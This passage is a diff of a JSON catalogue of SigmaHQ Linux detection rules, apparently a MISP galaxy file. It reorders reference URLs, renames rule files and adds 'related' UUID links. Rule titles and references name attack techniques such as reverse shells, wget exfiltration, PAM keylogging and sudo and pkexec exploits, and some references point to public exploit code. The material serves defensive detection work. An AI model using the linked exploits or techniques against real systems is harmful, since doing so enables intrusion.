"https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", "https://www.cisecurity.org/controls/cis-controls-list/", + "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/host_without_firewall.yml" ], 
@@ -61765,8 +79593,8 @@ "logsource.category": "No established category", "logsource.product": "No established product", "refs": [ - "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", "https://www.cisecurity.org/controls/cis-controls-list/", + "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/netflow_cleartext_protocols.yml" ], @@ -61801,6 +79629,29 @@ "attack.t1203" ] }, + "related": [ + { + "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "045b5f9c-49f7-4419-a236-9854fb3c827a", "value": "OMIGOD SCX RunAsProvider ExecuteShellCommand - Auditd" }, @@ -61849,6 +79700,15 @@ "attack.t1222.002" ] }, + "related": [ + { + "dest-uuid": "09b130a2-a77e-4af0-a361-f46f9aad1345", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "74c01ace-0152-4094-8ae2-6fd776dd43e5", "value": "File or Folder Permissions Change" }, @@ -61890,7 +79750,6 @@ "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.002/T1543.002.md", - "https://attack.mitre.org/techniques/T1543/002/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_systemd_service_creation.yml" ], "tags": [ 
@@ -61924,6 +79783,22 @@ "attack.t1059" ] }, + "related": [ + { + "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "808146b2-9332-4d78-9416-d7e47012d83d", "value": "BPFDoor Abnormal Process ID or Lock File Accessed" }, @@ -61940,7 +79815,6 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ - "https://attack.mitre.org/techniques/T1123/", "https://linux.die.net/man/1/arecord", "https://linuxconfig.org/how-to-test-microphone-with-audio-linux-sound-architecture-alsa", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_audio_capture.yml" @@ -61983,7 +79857,7 @@ "author": "Igor Fits, oscd.community", "creation_date": "2020/10/13", "falsepositive": [ - "Legitimate script work" + "Unknown" ], "filename": "lnx_auditd_binary_padding.yml", "level": "high", @@ -62015,7 +79889,6 @@ "logsource.product": "linux", "refs": [ "https://vitux.com/how-to-hide-confidential-files-in-images-on-debian-using-steganography/", - "https://attack.mitre.org/techniques/T1027/003/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_steghide_embed_steganography.yml" ], "tags": [ @@ -62088,7 +79961,6 @@ "refs": [ "https://www.cyberciti.biz/faq/xclip-linux-insert-files-command-output-intoclipboard/", "https://linux.die.net/man/1/xclip", - "https://attack.mitre.org/techniques/T1115/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_clipboard_collection.yml" ], "tags": [ 
@@ -62113,7 +79985,6 @@ "logsource.product": "linux", "refs": [ "https://vitux.com/how-to-hide-confidential-files-in-images-on-debian-using-steganography/", - "https://attack.mitre.org/techniques/T1027/003/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_steghide_extract_steganography.yml" ], "tags": [ @@ -62138,7 +80009,6 @@ "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.006/T1547.006.md", - "https://attack.mitre.org/techniques/T1547/006/", "https://linux.die.net/man/8/insmod", "https://man7.org/linux/man-pages/man8/kmod.8.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_load_module_insmod.yml" @@ -62149,6 +80019,15 @@ "attack.t1547.006" ] }, + "related": [ + { + "dest-uuid": "a1b52199-c8c5-438a-9ded-656f1d0888c6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "106d7cbd-80ff-4985-b682-a7043e5acb72", "value": "Loading of Kernel Module via Insmod" }, @@ -62190,8 +80069,8 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ - "https://access.redhat.com/security/cve/CVE-2021-4034", "https://github.com/berdav/CVE-2021-4034", + "https://access.redhat.com/security/cve/CVE-2021-4034", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4034", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_cve_2021_4034.yml" ], @@ -62200,6 +80079,15 @@ "attack.t1068" ] }, + "related": [ + { + "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "40a016ab-4f48-4eee-adde-bbf612695c53", "value": "Potential CVE-2021-4034 Exploitation Attempt" }, 
@@ -62216,10 +80104,9 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md", "https://linux.die.net/man/1/import", "https://imagemagick.org/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md", - "https://attack.mitre.org/techniques/T1113/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_screencapture_import.yml" ], "tags": [ @@ -62243,7 +80130,6 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ - "https://attack.mitre.org/techniques/T1562/004/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md", "https://firewalld.org/documentation/man-pages/firewall-cmd.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_disable_system_firewall.yml" @@ -62253,6 +80139,15 @@ "attack.defense_evasion" ] }, + "related": [ + { + "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "53059bc0-1472-438b-956a-7508a94a91f0", "value": "Disable System Firewall" }, @@ -62270,7 +80165,6 @@ "logsource.product": "linux", "refs": [ "https://zerotoroot.me/steganography-hiding-a-zip-in-a-jpeg-file/", - "https://attack.mitre.org/techniques/T1027/003/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_unzip_hidden_zip_files_steganography.yml" ], "tags": [ 
@@ -62296,8 +80190,8 @@ "refs": [ "https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/", "https://mn3m.info/posts/suid-vs-capabilities/", - "https://man7.org/linux/man-pages/man8/getcap.8.html", "https://int0x33.medium.com/day-44-linux-capabilities-privilege-escalation-via-openssl-with-selinux-enabled-and-enforced-74d2bec02099", + "https://man7.org/linux/man-pages/man8/getcap.8.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_capabilities_discovery.yml" ], "tags": [ @@ -62307,6 +80201,15 @@ "attack.t1548" ] }, + "related": [ + { + "dest-uuid": "67720091-eee3-4d2d-ae16-8264567f6f5b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "fe10751f-1995-40a5-aaa2-c97ccb4123fe", "value": "Linux Capabilities Discovery" }, @@ -62372,8 +80275,8 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.006/T1574.006.md", "https://eqllib.readthedocs.io/en/latest/analytics/fd9b987a-1101-4ed3-bda6-a70300eaf57e.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.006/T1574.006.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_ld_so_preload_mod.yml" ], "tags": [ @@ -62403,6 +80306,15 @@ "attack.t1036.003" ] }, + "related": [ + { + "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9d4548fa-bba0-4e88-bd66-5d5bf516cda0", "value": "Masquerading as Linux Crond Process" }, 
@@ -62420,7 +80332,6 @@ "logsource.product": "linux", "refs": [ "https://zerotoroot.me/steganography-hiding-a-zip-in-a-jpeg-file/", - "https://attack.mitre.org/techniques/T1027/003/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_hidden_zip_files_steganography.yml" ], "tags": [ @@ -62453,6 +80364,15 @@ "attack.t1552.003" ] }, + "related": [ + { + "dest-uuid": "8187bd2a-866f-4457-9009-86b0ddedffa3", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "eae8ce9f-bde9-47a6-8e79-f20d18419910", "value": "Suspicious History File Operations - Linux" }, @@ -62477,6 +80397,15 @@ "attack.t1070.006" ] }, + "related": [ + { + "dest-uuid": "47f2d673-ca62-47e9-929b-1b0be9657611", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b3cec4e7-6901-4b0d-a02d-8ab2d8eb818b", "value": "File Time Attribute Change - Linux" }, @@ -62501,6 +80430,15 @@ "attack.t1068" ] }, + "related": [ + { + "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "071d5e5a-9cef-47ec-bc4e-a42e34d8d0ed", "value": "Possible Coin Miner CPU Priority Param" }, @@ -62526,6 +80464,15 @@ "cve.2021.3156" ] }, + "related": [ + { + "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b9748c98-9ea7-4fdb-80b6-29bed6ba71d2", "value": "CVE-2021-3156 Exploitation Attempt Bruteforcing" }, 
@@ -62567,7 +80514,6 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ - "https://attack.mitre.org/tactics/TA0010/", "https://linux.die.net/man/1/wget", "https://gtfobins.github.io/gtfobins/wget/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_data_exfil_wget.yml" @@ -62577,6 +80523,15 @@ "attack.t1048.003" ] }, + "related": [ + { + "dest-uuid": "fb8d023d-45be-47e9-bc51-f56bcae6435b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "cb39d16b-b3b6-4a7a-8222-1cf24b686ffc", "value": "Data Exfiltration with Wget" }, @@ -62595,7 +80550,6 @@ "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.002/T1543.002.md", - "https://attack.mitre.org/techniques/T1543/002/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_pers_systemd_reload.yml" ], "tags": [ @@ -62627,6 +80581,15 @@ "attack.t1030" ] }, + "related": [ + { + "dest-uuid": "c3888c54-775d-4b2f-b759-75a2ececcbfd", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "2dad0cba-c62a-4a4f-949f-5f6ecd619769", "value": "Split A File Into Pieces - Linux" }, @@ -62644,7 +80607,6 @@ "logsource.product": "linux", "refs": [ "https://linux.die.net/man/1/xclip", - "https://attack.mitre.org/techniques/T1115/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_clipboard_image_collection.yml" ], "tags": [ @@ -62677,6 +80639,15 @@ "cve.2021.3156" ] }, + "related": [ + { + "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5ee37487-4eb8-4ac2-9be1-d7d14cdc559f", "value": "CVE-2021-3156 Exploitation Attempt" }, 
@@ -62702,6 +80673,15 @@ "attack.t1562.004" ] }, + "related": [ + { + "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "70b4156e-50fc-4523-aa50-c9dddf1993fc", "value": "Bpfdoor TCP Ports Redirect" }, @@ -62728,6 +80708,22 @@ "attack.resource_development" ] }, + "related": [ + { + "dest-uuid": "edadea33-549c-4ed1-9783-8f5a5853cbdf", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "7e3beebd-8bfe-4e7b-a892-e44ab06a75f9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a39d7fa7-3fbd-4dc2-97e1-d87f546b1bbc", "value": "Program Executions in Suspicious Folders" }, @@ -62752,6 +80748,15 @@ "attack.t1222.002" ] }, + "related": [ + { + "dest-uuid": "09b130a2-a77e-4af0-a361-f46f9aad1345", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a5b977d6-8a81-4475-91b9-49dbfcd941f7", "value": "Remove Immutable File Attribute - Auditd" }, @@ -62776,6 +80781,15 @@ "attack.t1560.001" ] }, + "related": [ + { + "dest-uuid": "00f90846-cbd1-4fc5-9233-df5c2bf2a662", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a3b5e3e9-1b49-4119-8b8e-0344a01f21ee", "value": "Data Compressed" }, @@ -62818,7 +80832,6 @@ "refs": [ "https://linux.die.net/man/1/xwd", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md#atomic-test-3---x-windows-capture", - "https://attack.mitre.org/techniques/T1113/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_screencaputre_xwd.yml" ], "tags": [ 
@@ -62850,6 +80863,15 @@ "attack.t1529" ] }, + "related": [ + { + "dest-uuid": "ff73aa03-0090-4464-83ac-f89e233c02bc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4cb57c2f-1f29-41f8-893d-8bed8e1c1d2f", "value": "System Shutdown/Reboot - Linux" }, @@ -62875,6 +80897,15 @@ "attack.t1006" ] }, + "related": [ + { + "dest-uuid": "0c8ab3eb-df48-4b9c-ace7-beacaac81cc5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "fb0647d7-371a-4553-8e20-33bbbe122956", "value": "Use of Debugfs to Access a Raw Disk" }, @@ -62891,10 +80922,9 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1201/T1201.md", "https://superuser.com/questions/150675/how-to-display-password-policy-information-for-a-user-ubuntu", "https://man7.org/linux/man-pages/man1/passwd.1.html", - "https://attack.mitre.org/techniques/T1201/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1201/T1201.md", "https://linux.die.net/man/1/chage", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_password_policy_discovery.yml" ], @@ -62903,6 +80933,15 @@ "attack.t1201" ] }, + "related": [ + { + "dest-uuid": "b6075259-dba3-44e9-87c7-e954f37ec0d5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ca94a6db-8106-4737-9ed2-3e3bb826af0a", "value": "Password Policy Discovery" }, 
@@ -62920,7 +80959,6 @@ "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md", - "https://attack.mitre.org/techniques/T1082/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_system_info_discovery.yml" ], "tags": [ @@ -62953,6 +80991,15 @@ "attack.t1546.004" ] }, + "related": [ + { + "dest-uuid": "b63a34e8-0a61-4c97-a23b-bf8a2ed812e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e74e15cc-c4b6-4c80-b7eb-dfe49feb7fe9", "value": "Edit of .bash_profile and .bashrc" }, @@ -62978,6 +81025,15 @@ "attack.t1485" ] }, + "related": [ + { + "dest-uuid": "d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "37222991-11e9-4b6d-8bdf-60fbe48f753e", "value": "Overwriting the File with Dev Zero or Null" }, @@ -62994,11 +81050,10 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ - "https://attack.mitre.org/techniques/T1003/", - "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/sec-configuring_pam_for_auditing", "https://linux.die.net/man/8/pam_tty_audit", - "https://access.redhat.com/articles/4409591#audit-record-types-2", + "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/sec-configuring_pam_for_auditing", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.001/T1056.001.md", + "https://access.redhat.com/articles/4409591#audit-record-types-2", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_keylogging_with_pam_d.yml" ], "tags": [ 
@@ -63007,6 +81062,15 @@ "attack.t1056.001" ] }, + "related": [ + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "49aae26c-450e-448b-911d-b3c13d178dfc", "value": "Linux Keylogging with Pam.d" }, @@ -63031,6 +81095,15 @@ "attack.t1059.004" ] }, + "related": [ + { + "dest-uuid": "a9d4b653-6915-42af-98b2-5758c4ceee56", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1543ae20-cbdf-4ec1-8d12-7664d667a825", "value": "Suspicious Commands Linux" }, @@ -63047,7 +81120,6 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ - "https://attack.mitre.org/techniques/T1564/001/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_hidden_files_directories.yml" ], @@ -63056,6 +81128,15 @@ "attack.t1564.001" ] }, + "related": [ + { + "dest-uuid": "ec8fc7e2-b356-455c-8db5-2e37be158e7d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d08722cd-3d09-449a-80b4-83ea2d9d4616", "value": "Hidden Files and Directories" }, @@ -63073,8 +81154,8 @@ "logsource.product": "linux", "refs": [ "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/security_guide/sec-understanding_audit_log_files", - "https://access.redhat.com/articles/4409591#audit-record-types-2", "https://www.youtube.com/watch?v=VmvY5SQm5-Y&ab_channel=M45C07", + "https://access.redhat.com/articles/4409591#audit-record-types-2", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_create_account.yml" ], "tags": [ 
@@ -63082,6 +81163,15 @@ "attack.persistence" ] }, + "related": [ + { + "dest-uuid": "635cbe30-392d-4e27-978e-66774357c762", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "759d0d51-bc99-4b5e-9add-8f5b2c8e7512", "value": "Creation Of An User Account" }, @@ -63099,8 +81189,8 @@ "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-1---port-scan", - "https://book.hacktricks.xyz/shells/shells/linux", "https://www.andreafortuna.org/2021/03/06/some-useful-tips-about-dev-tcp/", + "https://book.hacktricks.xyz/shells/shells/linux", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_susp_dev_tcp.yml" ], "tags": [ @@ -63156,6 +81246,15 @@ "attack.t1105" ] }, + "related": [ + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7a14080d-a048-4de8-ae58-604ce58a795b", "value": "Remote File Copy" }, @@ -63181,6 +81280,15 @@ "attack.t1059.004" ] }, + "related": [ + { + "dest-uuid": "a9d4b653-6915-42af-98b2-5758c4ceee56", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "41e5c73d-9983-4b69-bd03-e13b67e9623c", "value": "Equation Group Indicators" }, @@ -63205,6 +81313,15 @@ "attack.execution" ] }, + "related": [ + { + "dest-uuid": "ef67e13e-5598-4adc-bdb2-998225874fa9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c67fc22a-0be5-4b4f-aad5-2b32c4b69523", "value": "Symlink Etc Passwd" }, 
@@ -63229,6 +81346,15 @@ "attack.t1565.001" ] }, + "related": [ + { + "dest-uuid": "1cfcb312-b8d7-47a4-b560-4b16cc677292", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e09eb557-96d2-4de9-ba2d-30f712a5afd3", "value": "Commands to Clear or Remove the Syslog - Builtin" }, @@ -63253,6 +81379,15 @@ "attack.privilege_escalation" ] }, + "related": [ + { + "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "18b042f0-2ecd-4b6e-9f8d-aa7a7e7de781", "value": "Buffer Overflow Attempts" }, @@ -63277,6 +81412,15 @@ "attack.t1059.004" ] }, + "related": [ + { + "dest-uuid": "a9d4b653-6915-42af-98b2-5758c4ceee56", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "738d9bcf-6999-4fdb-b4ac-3033037db8ab", "value": "Suspicious Reverse Shell Command Line" }, @@ -63326,6 +81470,22 @@ "attack.t1098" ] }, + "related": [ + { + "dest-uuid": "635cbe30-392d-4e27-978e-66774357c762", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0ac15ec3-d24f-4246-aa2a-3077bb1cf90e", "value": "Privileged User Has Been Created" }, @@ -63351,6 +81511,15 @@ "attack.t1068" ] }, + "related": [ + { + "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7ba05b43-adad-4c02-b5e9-c8c35cdf9fa8", "value": "Nimbuspwn Exploitation" }, 
@@ -63375,6 +81544,15 @@ "attack.t1059.004" ] }, + "related": [ + { + "dest-uuid": "a9d4b653-6915-42af-98b2-5758c4ceee56", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8ec2c8b4-557a-4121-b87c-5dfb3a602fae", "value": "JexBoss Command Sequence" }, @@ -63439,10 +81617,10 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ - "https://artkond.com/2017/03/23/pivoting-guide/", - "https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb", "http://pastebin.com/FtygZ1cg", + "https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb", "http://www.threatgeek.com/2017/03/widespread-exploitation-attempts-using-cve-2017-5638.html", + "https://artkond.com/2017/03/23/pivoting-guide/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_susp_commands.yml" ], "tags": [ @@ -63450,6 +81628,15 @@ "attack.t1059.004" ] }, + "related": [ + { + "dest-uuid": "a9d4b653-6915-42af-98b2-5758c4ceee56", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "2aa1440c-9ae9-4d92-84a7-a9e5f5e31695", "value": "Suspicious Activity in Shell Commands" }, 
@@ -63466,9 +81653,9 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ + "https://github.com/uber-common/metta/blob/master/MITRE/Privilege_Escalation/privesc_linux_filesystemweakness.yml", "https://patrick-bareiss.com/detect-privilege-escalation-preparation-in-linux-with-sigma/", "https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/", - "https://github.com/uber-common/metta/blob/master/MITRE/Privilege_Escalation/privesc_linux_filesystemweakness.yml", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_priv_esc_prep.yml" ], "tags": [ @@ -63476,6 +81663,15 @@ "attack.t1059.004" ] }, + "related": [ + { + "dest-uuid": "a9d4b653-6915-42af-98b2-5758c4ceee56", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "444ade84-c362-4260-b1f3-e45e20e1a905", "value": "Privilege Escalation Preparation" }, @@ -63494,7 +81690,6 @@ "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.003/T1070.003.md", "https://www.hackers-arise.com/single-post/2016/06/20/Covering-your-BASH-Shell-Tracks-AntiForensics", - "https://attack.mitre.org/techniques/T1070/003/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_clear_cmd_history.yml" ], "tags": [ @@ -63502,6 +81697,15 @@ "attack.t1070.003" ] }, + "related": [ + { + "dest-uuid": "3aef9463-9a7a-43ba-8957-a867e07c1e6a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "fdc88d25-96fb-4b7c-9633-c0e417fdbd4e", "value": "Clear Command History" }, 
@@ -63513,19 +81717,28 @@ "falsepositive": [ "Unknown" ], - "filename": "lnx_susp_guacamole.yml", + "filename": "lnx_guacamole_susp_guacamole.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://research.checkpoint.com/2020/apache-guacamole-rce/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/guacamole/lnx_susp_guacamole.yml" + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/guacamole/lnx_guacamole_susp_guacamole.yml" ], "tags": [ "attack.credential_access", "attack.t1212" ] }, + "related": [ + { + "dest-uuid": "9c306d8d-cde7-4b4c-b6e8-d0bb16caca36", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1edd77db-0669-4fef-9598-165bda82826d", "value": "Guacamole Two Users Sharing Session Anomaly" }, @@ -63537,19 +81750,28 @@ "falsepositive": [ "Unknown" ], - "filename": "lnx_susp_vsftp.yml", + "filename": "lnx_vsftpd_susp_error_messages.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://github.com/dagwieers/vsftpd/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/vsftpd/lnx_susp_vsftp.yml" + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/vsftpd/lnx_vsftpd_susp_error_messages.yml" ], "tags": [ "attack.initial_access", "attack.t1190" ] }, + "related": 